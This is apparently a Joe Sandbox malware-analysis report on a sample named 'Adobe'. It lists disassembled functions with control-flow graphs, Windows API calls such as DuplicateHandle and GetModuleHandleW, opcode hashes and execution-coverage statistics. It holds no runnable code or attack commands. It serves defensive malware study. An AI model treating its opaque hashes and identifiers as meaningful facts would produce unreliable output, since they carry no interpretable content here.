                                                      • Instruction Fuzzy Hash: B25168B09013498FDB18DFA9D948BAEBBF1FF49304F208059E419A73A0DB749984CB65
                                                      Function 0094D0C0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 317 94d0c0-94d14f GetCurrentProcess 321 94d151-94d157 317->321 322 94d158-94d18c GetCurrentThread 317->322 321->322 323 94d195-94d1c9 GetCurrentProcess 322->323 324 94d18e-94d194 322->324 325 94d1d2-94d1ed call 94d699 323->325 326 94d1cb-94d1d1 323->326 324->323 330 94d1f3-94d222 GetCurrentThreadId 325->330 326->325 331 94d224-94d22a 330->331 332 94d22b-94d28d 330->332 331->332
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 0094D13E
                                                      • GetCurrentThread.KERNEL32 ref: 0094D17B
                                                      • GetCurrentProcess.KERNEL32 ref: 0094D1B8
                                                      • GetCurrentThreadId.KERNEL32 ref: 0094D211
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2064095388.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_940000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID:
                                                      • API String ID: 2063062207-0
                                                      • Opcode ID: c573a507886977c9985a93952745d617df7570fe05aa4c2e90e665bce48180ca
                                                      • Instruction ID: e0b3cb1b5ea3e788ff862c09a3cf9df300048840081ecb2b8dee1747e7b39616
                                                      • Opcode Fuzzy Hash: c573a507886977c9985a93952745d617df7570fe05aa4c2e90e665bce48180ca
                                                      • Instruction Fuzzy Hash: EE5178B09013098FDB18DFA9D948BAEBBF5FF48314F208059E419A7360DB749984CF65
                                                      Function 0094AE28 Relevance: 1.7, APIs: 1, Instructions: 209COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 362 94ae28-94ae37 363 94ae63-94ae67 362->363 364 94ae39-94ae46 call 94a14c 362->364 365 94ae69-94ae73 363->365 366 94ae7b-94aebc 363->366 369 94ae5c 364->369 370 94ae48 364->370 365->366 373 94aebe-94aec6 366->373 374 94aec9-94aed7 366->374 369->363 421 94ae4e call 94b0b0 370->421 422 94ae4e call 94b0c0 370->422 373->374 376 94aed9-94aede 374->376 377 94aefb-94aefd 374->377 375 94ae54-94ae56 375->369 380 94af98-94afaf 375->380 378 94aee0-94aee7 call 94a158 376->378 379 94aee9 376->379 381 94af00-94af07 377->381 383 94aeeb-94aef9 378->383 379->383 395 94afb1-94b010 380->395 384 94af14-94af1b 381->384 385 94af09-94af11 381->385 383->381 387 94af1d-94af25 384->387 388 94af28-94af31 call 94a168 384->388 385->384 387->388 393 94af33-94af3b 388->393 394 94af3e-94af43 388->394 393->394 396 94af45-94af4c 394->396 397 94af61-94af6e 394->397 413 94b012-94b014 395->413 396->397 399 94af4e-94af5e call 94a178 call 94a188 396->399 404 94af70-94af8e 397->404 405 94af91-94af97 397->405 399->397 404->405 414 94b016-94b03e 413->414 415 94b040-94b058 413->415 414->415 416 94b060-94b08b GetModuleHandleW 415->416 417 94b05a-94b05d 415->417 418 94b094-94b0a8 416->418 419 94b08d-94b093 416->419 417->416 419->418 421->375 422->375
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0094B07E
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2064095388.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_940000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 8f132f3d084e7676a88f9a70580a6baf03b1003291054bf8df4ed45c4af7b5d7
                                                      • Instruction ID: 305038057c5bd4a40c5fdf4d1213975c1ef8f26861eecd3ad664f2c9091d617d
                                                      • Opcode Fuzzy Hash: 8f132f3d084e7676a88f9a70580a6baf03b1003291054bf8df4ed45c4af7b5d7
                                                      • Instruction Fuzzy Hash: 99815770A00B458FD724DF2AD445BAABBF5FF88304F00892DE49AD7A50D775E849CB91
                                                      Function 009444B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 423 9444b0-9459d9 CreateActCtxA 426 9459e2-945a3c 423->426 427 9459db-9459e1 423->427 434 945a3e-945a41 426->434 435 945a4b-945a4f 426->435 427->426 434->435 436 945a60 435->436 437 945a51-945a5d 435->437 438 945a61 436->438 437->436 438->438
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 009459C9
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2064095388.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_940000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: bc14f6ffa2ccc70d7fd57756e8423dedf2d9ef3b877ded06571550cf30dfed31
                                                      • Instruction ID: 013c40b27d7955f93e8a1a3530a5d5ebcf32a93bd52b9096e528b299cc4575b7
                                                      • Opcode Fuzzy Hash: bc14f6ffa2ccc70d7fd57756e8423dedf2d9ef3b877ded06571550cf30dfed31
                                                      • Instruction Fuzzy Hash: 9D41E1B0C00B1DCBDB24DFA9C884B9EBBF5BF49304F20816AD418AB255DB756946CF91
                                                      Function 0094590C Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 440 94590c-945910 441 94591c-9459d9 CreateActCtxA 440->441 443 9459e2-945a3c 441->443 444 9459db-9459e1 441->444 451 945a3e-945a41 443->451 452 945a4b-945a4f 443->452 444->443 451->452 453 945a60 452->453 454 945a51-945a5d 452->454 455 945a61 453->455 454->453 455->455
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 009459C9
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2064095388.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_940000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: a9bcf851cd4e6701abd92a3ecbd8abb269572b18a623de27ae01d9775fa242f5
                                                      • Instruction ID: 3b107a1143e9e4a299dc3ba15fbce73b859de130a98f23af376104bbf1695719
                                                      • Opcode Fuzzy Hash: a9bcf851cd4e6701abd92a3ecbd8abb269572b18a623de27ae01d9775fa242f5
                                                      • Instruction Fuzzy Hash: 5841E2B0C00719CBDB24DFA9C984BDDBBF5BF48304F20816AD418AB255DB756946CF91
                                                      Function 0094D709 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 457 94d709-94d7a4 DuplicateHandle 458 94d7a6-94d7ac 457->458 459 94d7ad-94d7ca 457->459 458->459
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0094D797
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2064095388.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_940000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 6a5b23825bdf9c2dd4f6f06a8afdeb3f5d263328dbc76d3a9d8f4f655c5d74d7
                                                      • Instruction ID: c5ad150e4ce6f5677d594c6e641738a589983374baf832f423c68a65ae15315c
                                                      • Opcode Fuzzy Hash: 6a5b23825bdf9c2dd4f6f06a8afdeb3f5d263328dbc76d3a9d8f4f655c5d74d7
                                                      • Instruction Fuzzy Hash: 7521E3B59002489FDB10CFAAD584AEEBFF5FB48314F14841AE958A3311D379A945CFA1
                                                      Function 0094D710 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 462 94d710-94d7a4 DuplicateHandle 463 94d7a6-94d7ac 462->463 464 94d7ad-94d7ca 462->464 463->464
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0094D797
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2064095388.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_940000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 834344a2699ea5c052ee39c142285fdc29e7459e5cf198281140ddae62e98d0b
                                                      • Instruction ID: a3267f9e3c003d05dea387c20400b5814399fffa97557658f19ef5a61c02bc45
                                                      • Opcode Fuzzy Hash: 834344a2699ea5c052ee39c142285fdc29e7459e5cf198281140ddae62e98d0b
                                                      • Instruction Fuzzy Hash: 6821D5B59012489FDB10DF9AD584ADEFFF9FB48310F14841AE918A3350D379A944CFA5
                                                      Function 0094B018 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 467 94b018-94b058 468 94b060-94b08b GetModuleHandleW 467->468 469 94b05a-94b05d 467->469 470 94b094-94b0a8 468->470 471 94b08d-94b093 468->471 469->468 471->470
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0094B07E
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2064095388.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_940000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: e10e58d846efa447f1f3e5c12a6b6ba695f6b0a83c7ff30c2199a4d3ebb152e3
                                                      • Instruction ID: 10b456fba5bd2ed17c14e8476e3d5f2eff1457e6cbb3c37df6b489a8a4307353
                                                      • Opcode Fuzzy Hash: e10e58d846efa447f1f3e5c12a6b6ba695f6b0a83c7ff30c2199a4d3ebb152e3
                                                      • Instruction Fuzzy Hash: 6F11DFB5C003498FCB20DFAAC448A9EFBF8EB88714F10841AD929A7210D379A545CFA1
                                                      Function 008FD01C Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2063947610.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_8fd000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5998df40f1ac839f5aad7e8a7ba9fcc4cb4c749da040dbf2fac46a763d22bd6c
                                                      • Instruction ID: e6f52a474ad0bc7738e3722409ed26c5ce5e40c4df175b7fbaf666a0254b6c5c
                                                      • Opcode Fuzzy Hash: 5998df40f1ac839f5aad7e8a7ba9fcc4cb4c749da040dbf2fac46a763d22bd6c
                                                      • Instruction Fuzzy Hash: 8721D371504708DFDB15DF24D584B26BB66FB84314F20C569DB098B356CB3AD807CA61
                                                      Function 008FD1D4 Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2063947610.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_8fd000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c6fa095f01c3cbea77616b2cd0b36d65869598fafb0d2dd8821a63d348ca9c2a
                                                      • Instruction ID: f2815768d3e5877b5b93c0a74dcbfca590119a56d19655c712abfeb93067fa1d
                                                      • Opcode Fuzzy Hash: c6fa095f01c3cbea77616b2cd0b36d65869598fafb0d2dd8821a63d348ca9c2a
                                                      • Instruction Fuzzy Hash: 5521F571504308DFDB05DF24D5C0B26BB66FB84314F20C56DDB098B256C33AE846DAA1
                                                      Function 008FD1CF Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2063947610.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_8fd000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                      • Instruction ID: cdc4a4065e7c590189452a4c819d10f7356e0fcebcb9bbd5a007bd1ab44bedaa
                                                      • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                      • Instruction Fuzzy Hash: D811BE75504344DFCB02CF20C5C4B25BB62FB84314F24C6AADA498B256C33AE80ACBA1
                                                      Function 008FD017 Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2063947610.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_8fd000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                      • Instruction ID: 51afa2bf9103d28a337b7c202c72e4d25585914077a62efa7036c844627b0509
                                                      • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                      • Instruction Fuzzy Hash: 9A11BE75504784CFCB16CF24D5C4B25FB62FB84314F24C6A9DA498B656C33AD80ACB62
                                                      Function 008ED745 Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2063894956.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_8ed000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f965323cb2f582037488c9d4374e9f686074dd5b98fcfa6232c0c2f9f8e56a1b
                                                      • Instruction ID: 290889b4bfedd9228da33198c5a0329cd27daa14a6bf22b22d57592d41ac9022
                                                      • Opcode Fuzzy Hash: f965323cb2f582037488c9d4374e9f686074dd5b98fcfa6232c0c2f9f8e56a1b
                                                      • Instruction Fuzzy Hash: 8A012B310043849EE7209F17CD88B67BF9CFF47324F18C52AED198A286C2399844CAB1
                                                      Function 008ED744 Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2063894956.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_8ed000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 77b6ee7a1e0e5add2af0f2311c59c00ead3c033505edd8b2ee8e6df4df13bdde
                                                      • Instruction ID: 936b291524115388eac5c6ce52b102cfa7366077ae9090d5649fe21d6071877b
                                                      • Opcode Fuzzy Hash: 77b6ee7a1e0e5add2af0f2311c59c00ead3c033505edd8b2ee8e6df4df13bdde
                                                      • Instruction Fuzzy Hash: A5F062714043849EE7109F16CC88B62FF98EF56734F18C55AED485A286C2799844CAB1

                                                      Execution Graph

                                                      Execution Coverage:7.2%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:33
                                                      Total number of Limit Nodes:5
                                                      execution_graph 15880 2d2d0c0 15881 2d2d106 GetCurrentProcess 15880->15881 15883 2d2d151 15881->15883 15884 2d2d158 GetCurrentThread 15881->15884 15883->15884 15885 2d2d195 GetCurrentProcess 15884->15885 15886 2d2d18e 15884->15886 15887 2d2d1cb 15885->15887 15886->15885 15888 2d2d1f3 GetCurrentThreadId 15887->15888 15889 2d2d224 15888->15889 15890 2d2d710 DuplicateHandle 15891 2d2d7a6 15890->15891 15892 2d2ad30 15895 2d2ae28 15892->15895 15893 2d2ad3f 15896 2d2ae5c 15895->15896 15898 2d2ae39 15895->15898 15896->15893 15897 2d2b060 GetModuleHandleW 15899 2d2b08d 15897->15899 15898->15896 15898->15897 15899->15893 15900 2d24668 15901 2d2467a 15900->15901 15902 2d24686 15901->15902 15904 2d24779 15901->15904 15905 2d2479d 15904->15905 15909 2d24888 15905->15909 15913 2d24878 15905->15913 15911 2d248af 15909->15911 15910 2d2498c 15910->15910 15911->15910 15917 2d244b0 15911->15917 15915 2d24888 15913->15915 15914 2d2498c 15915->15914 15916 2d244b0 CreateActCtxA 15915->15916 15916->15914 15918 2d25918 CreateActCtxA 15917->15918 15920 2d259db 15918->15920

                                                      Executed Functions

                                                      Function 02D2D0B1 Relevance: 6.1, APIs: 4, Instructions: 130threadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 295 2d2d0b1-2d2d14f GetCurrentProcess 299 2d2d151-2d2d157 295->299 300 2d2d158-2d2d18c GetCurrentThread 295->300 299->300 301 2d2d195-2d2d1c9 GetCurrentProcess 300->301 302 2d2d18e-2d2d194 300->302 303 2d2d1d2-2d2d1ed call 2d2d699 301->303 304 2d2d1cb-2d2d1d1 301->304 302->301 308 2d2d1f3-2d2d222 GetCurrentThreadId 303->308 304->303 309 2d2d224-2d2d22a 308->309 310 2d2d22b-2d2d28d 308->310 309->310
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 02D2D13E
                                                      • GetCurrentThread.KERNEL32 ref: 02D2D17B
                                                      • GetCurrentProcess.KERNEL32 ref: 02D2D1B8
                                                      • GetCurrentThreadId.KERNEL32 ref: 02D2D211
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2170978120.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_2d20000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID:
                                                      • API String ID: 2063062207-0
                                                      • Opcode ID: af859f8e476028a43cb40e0a738ca30a4c70fe8cc986b1067697d3dfaa4c28f5
                                                      • Instruction ID: 8688f815d2877558b60e319e5bdf7e08d9a4ab09a0244acd9079525f3efd0894
                                                      • Opcode Fuzzy Hash: af859f8e476028a43cb40e0a738ca30a4c70fe8cc986b1067697d3dfaa4c28f5
                                                      • Instruction Fuzzy Hash: 9C5147B09013198FDB19DFA9D548BEEBBF1FF88308F208459E419A7360D7749948CB65
                                                      Function 02D2D0C0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 317 2d2d0c0-2d2d14f GetCurrentProcess 321 2d2d151-2d2d157 317->321 322 2d2d158-2d2d18c GetCurrentThread 317->322 321->322 323 2d2d195-2d2d1c9 GetCurrentProcess 322->323 324 2d2d18e-2d2d194 322->324 325 2d2d1d2-2d2d1ed call 2d2d699 323->325 326 2d2d1cb-2d2d1d1 323->326 324->323 330 2d2d1f3-2d2d222 GetCurrentThreadId 325->330 326->325 331 2d2d224-2d2d22a 330->331 332 2d2d22b-2d2d28d 330->332 331->332
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 02D2D13E
                                                      • GetCurrentThread.KERNEL32 ref: 02D2D17B
                                                      • GetCurrentProcess.KERNEL32 ref: 02D2D1B8
                                                      • GetCurrentThreadId.KERNEL32 ref: 02D2D211
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2170978120.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_2d20000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID:
                                                      • API String ID: 2063062207-0
                                                      • Opcode ID: 3ec067d8d55480f38e5d19aa1893406388584ce805019d64af1674b154dab246
                                                      • Instruction ID: 09daf9e53287884db4e6bdd873b230f937bb2407aad14f69a0c8269323eaf22e
                                                      • Opcode Fuzzy Hash: 3ec067d8d55480f38e5d19aa1893406388584ce805019d64af1674b154dab246
                                                      • Instruction Fuzzy Hash: 4F5135B09013098FDB18DFAAD548BEEBBF1FF88314F208459E419A7360D7749944CB65
                                                      Function 02D2AE28 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 361 2d2ae28-2d2ae37 362 2d2ae63-2d2ae67 361->362 363 2d2ae39-2d2ae46 call 2d2a14c 361->363 365 2d2ae7b-2d2aebc 362->365 366 2d2ae69-2d2ae73 362->366 369 2d2ae48 363->369 370 2d2ae5c 363->370 372 2d2aec9-2d2aed7 365->372 373 2d2aebe-2d2aec6 365->373 366->365 419 2d2ae4e call 2d2b0c0 369->419 420 2d2ae4e call 2d2b0b0 369->420 370->362 374 2d2aefb-2d2aefd 372->374 375 2d2aed9-2d2aede 372->375 373->372 380 2d2af00-2d2af07 374->380 377 2d2aee0-2d2aee7 call 2d2a158 375->377 378 2d2aee9 375->378 376 2d2ae54-2d2ae56 376->370 379 2d2af98-2d2afaf 376->379 382 2d2aeeb-2d2aef9 377->382 378->382 394 2d2afb1-2d2b010 379->394 383 2d2af14-2d2af1b 380->383 384 2d2af09-2d2af11 380->384 382->380 387 2d2af28-2d2af31 call 2d2a168 383->387 388 2d2af1d-2d2af25 383->388 384->383 392 2d2af33-2d2af3b 387->392 393 2d2af3e-2d2af43 387->393 388->387 392->393 395 2d2af61-2d2af6e 393->395 396 2d2af45-2d2af4c 393->396 412 2d2b012-2d2b058 394->412 403 2d2af70-2d2af8e 395->403 404 2d2af91-2d2af97 395->404 396->395 397 2d2af4e-2d2af5e call 2d2a178 call 2d2a188 396->397 397->395 403->404 414 2d2b060-2d2b08b GetModuleHandleW 412->414 415 2d2b05a-2d2b05d 412->415 416 2d2b094-2d2b0a8 414->416 417 2d2b08d-2d2b093 414->417 415->414 417->416 419->376 420->376
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 02D2B07E
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2170978120.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_2d20000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: db4fc20041a269e808453efd7b61f092cb0b73daf295735e4f4b53390f37f127
                                                      • Instruction ID: 98bc77481a83e0739444c5ae9de2f4db363e3e552f46f9bbedd1692d01ed0550
                                                      • Opcode Fuzzy Hash: db4fc20041a269e808453efd7b61f092cb0b73daf295735e4f4b53390f37f127
                                                      • Instruction Fuzzy Hash: 1F713470A00B158FD724DF29C44075ABBF1FF88308F10892AE49A97B50DB78E849CB90
                                                      Function 02D2590C Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 421 2d2590c-2d25914 422 2d25918-2d259d9 CreateActCtxA 421->422 424 2d259e2-2d25a3c 422->424 425 2d259db-2d259e1 422->425 432 2d25a4b-2d25a4f 424->432 433 2d25a3e-2d25a41 424->433 425->424 434 2d25a60-2d25a90 432->434 435 2d25a51-2d25a5d 432->435 433->432 439 2d25a42-2d25a4a 434->439 440 2d25a92-2d25b14 434->440 435->434 439->432
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 02D259C9
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2170978120.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_2d20000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: 1dec7df5a995d2ea1dcd6dafcd7a7f8e6d4a8921b42d19ef5501ee2aa1c8a977
                                                      • Instruction ID: c2a119d43e91c2b5cde3656445dbdb8fd7e42cb02bc9f6b4f94d38b44a71a141
                                                      • Opcode Fuzzy Hash: 1dec7df5a995d2ea1dcd6dafcd7a7f8e6d4a8921b42d19ef5501ee2aa1c8a977
                                                      • Instruction Fuzzy Hash: 1B41E4B0C00729CBDB25DFA9C885BDDBBB5BF49308F60805AD408AB355DB75694ACF50
                                                      Function 02D244B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 442 2d244b0-2d259d9 CreateActCtxA 445 2d259e2-2d25a3c 442->445 446 2d259db-2d259e1 442->446 453 2d25a4b-2d25a4f 445->453 454 2d25a3e-2d25a41 445->454 446->445 455 2d25a60-2d25a90 453->455 456 2d25a51-2d25a5d 453->456 454->453 460 2d25a42-2d25a4a 455->460 461 2d25a92-2d25b14 455->461 456->455 460->453
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 02D259C9
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2170978120.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_2d20000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: b5e52ed66798631799fb8f30b1112de4fefadefd1ea6c5cb0e02f879a7919541
                                                      • Instruction ID: b146d7266759a94c0abe3588b95203e092e7f3218e53924eb63f0f062f6d038f
                                                      • Opcode Fuzzy Hash: b5e52ed66798631799fb8f30b1112de4fefadefd1ea6c5cb0e02f879a7919541
                                                      • Instruction Fuzzy Hash: 9941E5B0C0072DCBDB24DFA9C885BDDBBB5BF49304F60805AD408AB255DB756949CF90
                                                      Function 02D2D710 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 468 2d2d710-2d2d7a4 DuplicateHandle 469 2d2d7a6-2d2d7ac 468->469 470 2d2d7ad-2d2d7ca 468->470 469->470
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02D2D797
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2170978120.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_2d20000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 148e30f2fffb7f003527dfc4652e36fe9978020de8cd624b6d632788551911ed
                                                      • Instruction ID: 45383d025b137f45d18273900b5f58248d3fe41574426416108e8bd2c85568c6
                                                      • Opcode Fuzzy Hash: 148e30f2fffb7f003527dfc4652e36fe9978020de8cd624b6d632788551911ed
                                                      • Instruction Fuzzy Hash: C721C4B59002589FDB10CF9AD584ADEFBF9FB48314F14845AE918A3350D378A944CFA5
                                                      Function 02D2D709 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 463 2d2d709-2d2d7a4 DuplicateHandle 464 2d2d7a6-2d2d7ac 463->464 465 2d2d7ad-2d2d7ca 463->465 464->465
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02D2D797
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2170978120.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_2d20000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: f4e7c62041f6546973d09ae3de7b6e675793e462705c8de2967eadc26c7067a9
